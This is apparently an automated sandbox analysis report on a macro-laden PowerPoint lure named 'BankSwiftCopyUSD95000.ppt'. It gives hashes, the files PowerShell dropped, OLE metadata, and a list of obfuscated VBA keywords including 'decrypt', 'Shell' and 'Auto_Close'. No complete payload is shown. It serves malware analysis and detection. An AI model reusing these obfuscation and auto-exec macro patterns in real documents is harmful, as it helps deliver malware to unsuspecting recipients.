                                                                                                                                                                                                            Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\J8I74OU51TKSDH4DLI8O.temp
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8016
                                                                                                                                                                                                            Entropy (8bit):3.585483093071589
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:chQCsMq2yqvsqvJCwo1z8hQCsMq2yqvsEHyqvJCworbzkKY2PHmxyR/MlUV/Iu:cyko1z8ywHnorbzktxyRPIu
                                                                                                                                                                                                            MD5:CFED356B7D3C67E02B444A42748C9C30
                                                                                                                                                                                                            SHA1:9F8F99098E818E40DEF5CEBB79D6750E4218CA39
                                                                                                                                                                                                            SHA-256:DF469FB95559F0412C9AF5C3AD77C12F276241ABABF606D60695F40BABCBAF56
                                                                                                                                                                                                            SHA-512:C3B154749C955D91EE2B3577987FEF327EBBA37ED07FC3CFF97169F73CC7CB1A22DD38D85E320DE6302485FF806206B8D3698B59CACF4E95074C8D7A94B50221
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\K99IMC5JY7YG7OEZH6Y6.temp
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8016
                                                                                                                                                                                                            Entropy (8bit):3.5869379648879183
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:chQCsMq2yqvsqvJCwo1z8hQCsMq2yqvsEHyqvJCworbzbKKr8PHmZqR/MlUV/Iu:cyko1z8ywHnorbzbPxZqRPIu
                                                                                                                                                                                                            MD5:D62CC9CCF77316A2AA6A729F57925D11
                                                                                                                                                                                                            SHA1:00678A777EC4BF4C3AD3EA8B922FF9481CE5BFDC
                                                                                                                                                                                                            SHA-256:93390D2FE903C3BDD52EEB40A7A231B9D176C8C8B54AE580A6681F2E701ACED0
                                                                                                                                                                                                            SHA-512:8480FC261FDFF51E9BC8B9345A8532408E699FD60FF6A354B01E7DCCCC6F7AF991A8840790344B042029656AF0EFBB450E90DAA3A24E371EC4E3CC458B70FAF2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.

                                                                                                                                                                                                            Static File Info

                                                                                                                                                                                                            General

                                                                                                                                                                                                            File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: U2, Last Saved By: Master Mana, Revision Number: 3, Name of Creating Application: Microsoft Office PowerPoint, Total Editing Time: 03:01, Create Time/Date: Tue Jan 12 20:38:51 2021, Last Saved Time/Date: Tue Jan 12 20:41:52 2021, Number of Words: 0
                                                                                                                                                                                                            Entropy (8bit):3.52446566989119
                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                            • Microsoft PowerPoint document (31509/1) 79.74%
                                                                                                                                                                                                            • Generic OLE2 / Multistream Compound File (8008/1) 20.26%
                                                                                                                                                                                                            File name:BankSwiftCopyUSD95000.ppt
                                                                                                                                                                                                            File size:101888
                                                                                                                                                                                                            MD5:7f0b415d0b7a76530b2f510a910811e5
                                                                                                                                                                                                            SHA1:480594ad26c91dd9d719c80334285375540dc83e
                                                                                                                                                                                                            SHA256:8d3e1d1a1775191a33980069f500e37f22bdcd0a1ad3544ab4a9d0a651fbd019
                                                                                                                                                                                                            SHA512:d9b3320b51f390a6f75e7e3102044557e6476103c94ec4451819b78b4503f8018fee7ce8f70657473b310b14b752935fac2b7e5caaeb318e09a9af317701d8f4
                                                                                                                                                                                                            SSDEEP:768:27AB11Q3bZPGYj9c8OFEvk4kemSpn0jlO23cjo:fBPuxk5LSpElO2L
                                                                                                                                                                                                            File Content Preview:........................>.......................................................o..............................................................................................................................................................................

                                                                                                                                                                                                            File Icon

                                                                                                                                                                                                            Icon Hash:e4eaeaaaa4bcbcb4

                                                                                                                                                                                                            Static OLE Info

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Document Type:OLE
                                                                                                                                                                                                            Number of OLE Files:1

                                                                                                                                                                                                            OLE File "BankSwiftCopyUSD95000.ppt"

                                                                                                                                                                                                            Indicators

                                                                                                                                                                                                            Has Summary Info:True
                                                                                                                                                                                                            Application Name:Microsoft Office PowerPoint
                                                                                                                                                                                                            Encrypted Document:False
                                                                                                                                                                                                            Contains Word Document Stream:False
                                                                                                                                                                                                            Contains Workbook/Book Stream:False
                                                                                                                                                                                                            Contains PowerPoint Document Stream:False
                                                                                                                                                                                                            Contains Visio Document Stream:False
                                                                                                                                                                                                            Contains ObjectPool Stream:
                                                                                                                                                                                                            Flash Objects Count:
                                                                                                                                                                                                            Contains VBA Macros:True

                                                                                                                                                                                                            Summary

                                                                                                                                                                                                            Code Page:1252
                                                                                                                                                                                                            Title:
                                                                                                                                                                                                            Author:U2
                                                                                                                                                                                                            Last Saved By:Master Mana
                                                                                                                                                                                                            Revion Number:3
                                                                                                                                                                                                            Total Edit Time:181
                                                                                                                                                                                                            Create Time:2021-01-12 20:38:51.224482
                                                                                                                                                                                                            Last Saved Time:2021-01-12 20:41:52.425000
                                                                                                                                                                                                            Number of Words:0
                                                                                                                                                                                                            Thumbnail:;qTTTA Z(Zs{kcc{{{{{ss{{skkkk{{{scZZRZc{ZZZZckcccccckss{19BJBB
                                                                                                                                                                                                            Creating Application:Microsoft Office PowerPoint

                                                                                                                                                                                                            Document Summary

                                                                                                                                                                                                            Document Code Page:1252
                                                                                                                                                                                                            Presentation Target Format:Widescreen
                                                                                                                                                                                                            Number of Bytes:0
                                                                                                                                                                                                            Number of Paragraphs:0
                                                                                                                                                                                                            Number of Slides:0
                                                                                                                                                                                                            Number of Pages with Notes:0
                                                                                                                                                                                                            Number of Hidden Slides:0
                                                                                                                                                                                                            Number of Sound/Video Clips:0
                                                                                                                                                                                                            Thumbnail Scaling Desired:False
                                                                                                                                                                                                            Contains Dirty Links:False
                                                                                                                                                                                                            Shared Document:False
                                                                                                                                                                                                            Changed Hyperlinks:False
                                                                                                                                                                                                            Application Version:1048576

                                                                                                                                                                                                            Streams with VBA

                                                                                                                                                                                                            VBA File Name: Module1.bas, Stream Size: 33850
                                                                                                                                                                                                            General
                                                                                                                                                                                                            Stream Path:VBA/Module1
                                                                                                                                                                                                            VBA File Name:Module1.bas
                                                                                                                                                                                                            Stream Size:33850
                                                                                                                                                                                                            Data ASCII:. . . . . . . . . . / . . . . . . . . . . . . . . . 0 . . . o . . . . . . . . . . ! i ^ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                                            Data Raw:01 16 01 00 06 f0 00 00 00 c4 2f 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 16 30 00 00 f6 6f 00 00 00 00 00 00 01 00 00 00 21 69 5e 9e 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 04 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                                                                            VBA Code Keywords

                                                                                                                                                                                                            Keyword
                                                                                                                                                                                                            QUGzGlLxMQTLkNscYMh
                                                                                                                                                                                                            ktRMprYexFvb
                                                                                                                                                                                                            VIIksEhAgEViVTNgdzju
                                                                                                                                                                                                            "jaoyhhTGhDQfLe"
                                                                                                                                                                                                            VQuwdxCKAgppnsP
                                                                                                                                                                                                            nXgSUoXaonITwVRyRI:
                                                                                                                                                                                                            wapVcvDtZTUSYIBInN
                                                                                                                                                                                                            Public
                                                                                                                                                                                                            decrypt("h",
                                                                                                                                                                                                            Shell
                                                                                                                                                                                                            pUQQPUFLTkKJaPS:
                                                                                                                                                                                                            KhgHpGswQxIC
                                                                                                                                                                                                            gzSmhVBKLJOzszerqGK
                                                                                                                                                                                                            nXgSUoXaonITwVRyRI
                                                                                                                                                                                                            "uRYf"
                                                                                                                                                                                                            ktRMprYexFvb:
                                                                                                                                                                                                            xfhBejwGcpdOqMLnUm:
                                                                                                                                                                                                            gpzuYnFatnd:
                                                                                                                                                                                                            OoOaTmjFcAsoARgBp:
                                                                                                                                                                                                            kVazolfxuRnLRNadrMO()
                                                                                                                                                                                                            onOwNzDeEPJcZvQqiep
                                                                                                                                                                                                            decrypt("u",
                                                                                                                                                                                                            "lMhLkBNCzt"
                                                                                                                                                                                                            HJBbDiSOCQNESdLK
                                                                                                                                                                                                            BYHSYUgxLTUeCxacIOi
                                                                                                                                                                                                            bzdHFncwmdrB
                                                                                                                                                                                                            While
                                                                                                                                                                                                            doFUcenKFjl()
                                                                                                                                                                                                            qrRbnPjNmEeEPJcKiRc()
                                                                                                                                                                                                            cryKMTIhjNeuJeyeLL:
                                                                                                                                                                                                            "yqPfQprLotGR"
                                                                                                                                                                                                            TJAOZHHuhHerFmD
                                                                                                                                                                                                            hkbAPIsadx
                                                                                                                                                                                                            bzdHFncwmdrB:
                                                                                                                                                                                                            qhGjOMujDtky
                                                                                                                                                                                                            decrypt("q",
                                                                                                                                                                                                            "TpqzJEi"
                                                                                                                                                                                                            nQedtxArQgZ()
                                                                                                                                                                                                            iuIqHuyYLJDVSpLkqm()
                                                                                                                                                                                                            kpaSaERQhknf
                                                                                                                                                                                                            "umiuKavjsPKoqQrwEtZi"
                                                                                                                                                                                                            "cSgraZMyawIQ"
                                                                                                                                                                                                            BYHSYUgxLTUeCxacIOi:
                                                                                                                                                                                                            JKTeZCRlEYSHn
                                                                                                                                                                                                            "NyrydDpFJLDdFkUPE"
                                                                                                                                                                                                            huFonbMoKQlSk
                                                                                                                                                                                                            OoOaTmjFcAsoARgBp
                                                                                                                                                                                                            String,
                                                                                                                                                                                                            eubhAIxdZZQcNGN()
                                                                                                                                                                                                            OONSDwDivuKNQIhw:
                                                                                                                                                                                                            bMQqfcVolHeCIEPTi
                                                                                                                                                                                                            mjbRBwEkswXsnplYNF
                                                                                                                                                                                                            decrypt("|",
                                                                                                                                                                                                            ofmAwoLutcZuXfyhyL
                                                                                                                                                                                                            "tfYfJVUlpsjIY"
                                                                                                                                                                                                            FfTQKdawSrxtEIQ:
                                                                                                                                                                                                            "MyORUMlOteZN"
                                                                                                                                                                                                            MgzujOYZQcMFMrEDT
                                                                                                                                                                                                            HlPNvkEulzJ:
                                                                                                                                                                                                            GhgwmphFjNLti()
                                                                                                                                                                                                            Auto_Close()
                                                                                                                                                                                                            wQvTlxmjdvsPzJPLYop()
                                                                                                                                                                                                            KDnVYsUanxSgTF:
                                                                                                                                                                                                            FfTQKdawSrxtEIQ
                                                                                                                                                                                                            DoEvents
                                                                                                                                                                                                            HlPNvkEulzJ
                                                                                                                                                                                                            TJAOZHHuhHerFmD:
                                                                                                                                                                                                            cryKMTIhjNeuJeyeLL
                                                                                                                                                                                                            xVnzolfxuRBLRNZqrMO
                                                                                                                                                                                                            KDnVYsUanxSgTF
                                                                                                                                                                                                            wuQEVHLmLQ
                                                                                                                                                                                                            AefLgltjOYYQcyFM()
                                                                                                                                                                                                            SxvdRmdTisbaN
                                                                                                                                                                                                            HHQbeVuJCmTQrTYmj
                                                                                                                                                                                                            JKTeZCRlEYSHn:
                                                                                                                                                                                                            kpaSaERQhknf:
                                                                                                                                                                                                            JVmnIKTrZCRyEYgVBw
                                                                                                                                                                                                            "AaaA"
                                                                                                                                                                                                            MbIaLPpebUnkHdBHDP
                                                                                                                                                                                                            Currency
                                                                                                                                                                                                            IgPagcnEFbdmJqTkQQq
                                                                                                                                                                                                            bMQqfcVolHeCIEPTi:
                                                                                                                                                                                                            VQuwdxCKAgppnsP:
                                                                                                                                                                                                            "zEROxKkkLThIdHgxYyJD"
                                                                                                                                                                                                            RAznnOQjLfKjAMAys
                                                                                                                                                                                                            rpugZgKQQmqtk:
                                                                                                                                                                                                            ChtsIMPGgvoYFI:
                                                                                                                                                                                                            VIIksEhAgEViVTNgdzju:
                                                                                                                                                                                                            hHvsmECZuS()
                                                                                                                                                                                                            zEROxKkkLTgIcHgxYxIC
                                                                                                                                                                                                            JLzWDvGFm
                                                                                                                                                                                                            Integer)
                                                                                                                                                                                                            JLzWDvGFm)
                                                                                                                                                                                                            "KCzK"
                                                                                                                                                                                                            KRZDPPfjmeCRKucf
                                                                                                                                                                                                            "wsEU"
                                                                                                                                                                                                            zEROxKkkLTgIcHgxYxIC:
                                                                                                                                                                                                            ZYosumLbSDlnHkpDNi()
                                                                                                                                                                                                            CHflsQkjzDFxQmeO()
                                                                                                                                                                                                            hgkVcjAbaqg
                                                                                                                                                                                                            KTeZCRlEYSHnwxvAl
                                                                                                                                                                                                            oTPPNSEKRjJIZOR
                                                                                                                                                                                                            "mrEBkxQQ"
                                                                                                                                                                                                            yYLJDVSpLkpmxA:
                                                                                                                                                                                                            DnxDzLdezAJ:
                                                                                                                                                                                                            JVmnIKTrZCRyEYgVBw:
                                                                                                                                                                                                            piRACQzERc()
                                                                                                                                                                                                            QAPwCVeTzuvty()
                                                                                                                                                                                                            kLfKjAbAMGZHeNZfbmDS:
                                                                                                                                                                                                            Integer
                                                                                                                                                                                                            calcmm
                                                                                                                                                                                                            gpzuYnFatnd
                                                                                                                                                                                                            ofmAwoLutcZuXfyhyL:
                                                                                                                                                                                                            mjbRBwEkswXsnplYNF:
                                                                                                                                                                                                            QqQcVolIeCurCTiDrA
                                                                                                                                                                                                            aSCkmHkoCMhviUvRQ()
                                                                                                                                                                                                            Attribute
                                                                                                                                                                                                            "yQmfPxzTwBOLuHhhI"
                                                                                                                                                                                                            syuGQmtvEcQ
                                                                                                                                                                                                            DoEvents:
                                                                                                                                                                                                            ChtsIMPGgvoYFI
                                                                                                                                                                                                            JomUIdTKZjRQEEg
                                                                                                                                                                                                            HPQaytVYEKemcH
                                                                                                                                                                                                            MsgBox
                                                                                                                                                                                                            (WINWORD
                                                                                                                                                                                                            LaVESrsScoQkOnFfF:
                                                                                                                                                                                                            lyYYzHUwQvTlLmxr()
                                                                                                                                                                                                            decrypt
                                                                                                                                                                                                            VB_Name
                                                                                                                                                                                                            uYZFLfndIDECHsz:
                                                                                                                                                                                                            uYZFLfndIDECHsz
                                                                                                                                                                                                            "NpJoMeEfqkClIsC"
                                                                                                                                                                                                            FGQojMOuBUcRxstrw
                                                                                                                                                                                                            Function
                                                                                                                                                                                                            bkupSiBUoj()
                                                                                                                                                                                                            "YfvVUlbeV"
                                                                                                                                                                                                            "BYHSZUgxLTUfCxbcIPi"
                                                                                                                                                                                                            yTHQpjMOvPUdSyHH
                                                                                                                                                                                                            lelPqcswyqPsQHC:
                                                                                                                                                                                                            "kPKLJ"
                                                                                                                                                                                                            foLGkmSmsApUe()
                                                                                                                                                                                                            YfIVUlprjIYPAikFimA
                                                                                                                                                                                                            PvrrqugmtK()
                                                                                                                                                                                                            (decrypt("N{{x{*",
                                                                                                                                                                                                            wuQEVHLmLQ:
                                                                                                                                                                                                            RJjLqbVKfVMalTSGsT()
                                                                                                                                                                                                            calcmm):
                                                                                                                                                                                                            AKQMZpqLNQucEUBHbjY()
                                                                                                                                                                                                            QqQcVolIeCurCTiDrA:
                                                                                                                                                                                                            pBexdASsSeYqawg
                                                                                                                                                                                                            cafPQeuVUl()
                                                                                                                                                                                                            pUQQPUFLTkKJaPS
                                                                                                                                                                                                            QUGzGlLxMQTLkNscYMh:
                                                                                                                                                                                                            xfhBejwGcpdOqMLnUm
                                                                                                                                                                                                            DnxDzLdezAJ
                                                                                                                                                                                                            huFonbMoKQlSk:
                                                                                                                                                                                                            yYLJDVSpLkpmxA
                                                                                                                                                                                                            String
                                                                                                                                                                                                            fDxbdJejrhMVVUawDKpB()
                                                                                                                                                                                                            NAnOljLtKwAaALFYUs
                                                                                                                                                                                                            "SoqzJEixPkDxnScc"
                                                                                                                                                                                                            HPQaytVYEKemcH:
                                                                                                                                                                                                            SADYAESdyLyl()
                                                                                                                                                                                                            aaBJQySxVnzo()
                                                                                                                                                                                                            "PhSQwQicurO"
                                                                                                                                                                                                            Private
                                                                                                                                                                                                            rpugZgKQQmqtk
                                                                                                                                                                                                            LaVESrsScoQkOnFfF
                                                                                                                                                                                                            hgkVcjAbaqg:
                                                                                                                                                                                                            OONSDwDivuKNQIhw
                                                                                                                                                                                                            YVDsMDuHSBAooP()
                                                                                                                                                                                                            YqawgrxtEVk()
                                                                                                                                                                                                            VBA Code

                                                                                                                                                                                                            Streams

                                                                                                                                                                                                            Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 444
                                                                                                                                                                                                            General
                                                                                                                                                                                                            Stream Path:\x5DocumentSummaryInformation
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Stream Size:444
                                                                                                                                                                                                            Entropy:3.11131593238
                                                                                                                                                                                                            Base64 Encoded:False
                                                                                                                                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . . . . . W i d e s c r e e n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                                            Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 8c 01 00 00 0f 00 00 00 01 00 00 00 80 00 00 00 03 00 00 00 88 00 00 00 04 00 00 00 9c 00 00 00 06 00 00 00 a4 00 00 00 07 00 00 00 ac 00 00 00 08 00 00 00 b4 00 00 00 09 00 00 00 bc 00 00 00 0a 00 00 00 c4 00 00 00 17 00 00 00 cc 00 00 00
                                                                                                                                                                                                            Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 43632
                                                                                                                                                                                                            General
                                                                                                                                                                                                            Stream Path:\x5SummaryInformation
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Stream Size:43632
                                                                                                                                                                                                            Entropy:0.550494612512
                                                                                                                                                                                                            Base64 Encoded:False
                                                                                                                                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . @ . . . . . . . . . . . ` . . . . . . . h . . . . . . . t . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . U 2 . . . . . . . . . . M a s t e r M a n a . . . . . . . . . 3 . . . . . . . . . . . M i c r o s o f t O f f i c e P o w e r P o i n t . @ . . . . . . l . . . .
                                                                                                                                                                                                            Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 40 aa 00 00 0b 00 00 00 01 00 00 00 60 00 00 00 02 00 00 00 68 00 00 00 04 00 00 00 74 00 00 00 08 00 00 00 80 00 00 00 09 00 00 00 94 00 00 00 12 00 00 00 a0 00 00 00 0a 00 00 00 c4 00 00 00 0c 00 00 00 d0 00 00 00 0d 00 00 00 dc 00 00 00
                                                                                                                                                                                                            Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 358
                                                                                                                                                                                                            General
                                                                                                                                                                                                            Stream Path:PROJECT
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Stream Size:358
                                                                                                                                                                                                            Entropy:5.3465679306
                                                                                                                                                                                                            Base64 Encoded:True
                                                                                                                                                                                                            Data ASCII:I D = " { E B D 3 2 E 8 C - 6 5 7 5 - 4 3 D 3 - 9 E 2 A - A 9 4 D E 9 A A 1 2 3 8 } " . . M o d u l e = M o d u l e 1 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 1 6 1 4 1 4 6 9 E C 9 7 6 F 9 B 6 F 9 B 6 F 9 B 6 F 9 B " . . D P B = " 9 5 9 7 9 7 E 6 6 9 6 4 6 A 6 4 6 A 6 4 " . . G C = " 1 4 1 6 1 6 6 7 E A E 7 E B E 7 E B 1 8 " . . . . [ H o s t E x t e n d e r I n f o ] . . & H 0 0 0 0 0 0 0
                                                                                                                                                                                                            Data Raw:49 44 3d 22 7b 45 42 44 33 32 45 38 43 2d 36 35 37 35 2d 34 33 44 33 2d 39 45 32 41 2d 41 39 34 44 45 39 41 41 31 32 33 38 7d 22 0d 0a 4d 6f 64 75 6c 65 3d 4d 6f 64 75 6c 65 31 0d 0a 4e 61 6d 65 3d 22 56 42 41 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22 0d 0a 56 65 72 73 69 6f 6e 43 6f 6d 70 61 74 69 62 6c 65 33 32 3d 22 33 39 33 32 32 32 30 30
                                                                                                                                                                                                            Stream Path: PROJECTwm, File Type: data, Stream Size: 26
                                                                                                                                                                                                            General
                                                                                                                                                                                                            Stream Path:PROJECTwm
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Stream Size:26
                                                                                                                                                                                                            Entropy:2.50738010242
                                                                                                                                                                                                            Base64 Encoded:False
                                                                                                                                                                                                            Data ASCII:M o d u l e 1 . M . o . d . u . l . e . 1 . . . . .
                                                                                                                                                                                                            Data Raw:4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 31 00 00 00 00 00
                                                                                                                                                                                                            Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 6034
                                                                                                                                                                                                            General
                                                                                                                                                                                                            Stream Path:VBA/_VBA_PROJECT
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Stream Size:6034
                                                                                                                                                                                                            Entropy:5.43827372365
                                                                                                                                                                                                            Base64 Encoded:False
                                                                                                                                                                                                            Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . , . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . . ( . x . 8 . 6 . ) . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . .
                                                                                                                                                                                                            Data Raw:cc 61 af 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 2c 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                                                                                                                                                                                                            Stream Path: VBA/__SRP_0, File Type: data, Stream Size: 3544
                                                                                                                                                                                                            General
                                                                                                                                                                                                            Stream Path:VBA/__SRP_0
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Stream Size:3544
                                                                                                                                                                                                            Entropy:4.42422055205
                                                                                                                                                                                                            Base64 Encoded:False
                                                                                                                                                                                                            Data ASCII:. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . . . . . . . . . . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ W . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . J . 1 . . x . H . . C . . w . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . . p . . . . . . . . . . . . .
                                                                                                                                                                                                            Data Raw:93 4b 2a af 01 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 80 03 00 00 80 00 00 00 80 00 00 00 80 00 00 00 04 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 02 00 00 7e 03 00 00 7e 03 00 00 7e 03 00 00 7e
                                                                                                                                                                                                            Stream Path: VBA/__SRP_1, File Type: data, Stream Size: 100
                                                                                                                                                                                                            General
                                                                                                                                                                                                            Stream Path:VBA/__SRP_1
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Stream Size:100
                                                                                                                                                                                                            Entropy:2.94276509873
                                                                                                                                                                                                            Base64 Encoded:False
                                                                                                                                                                                                            Data ASCII:r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M v V D t f s Y 1 . . . . . . . . J L z W D v G F m l . . . . . . .
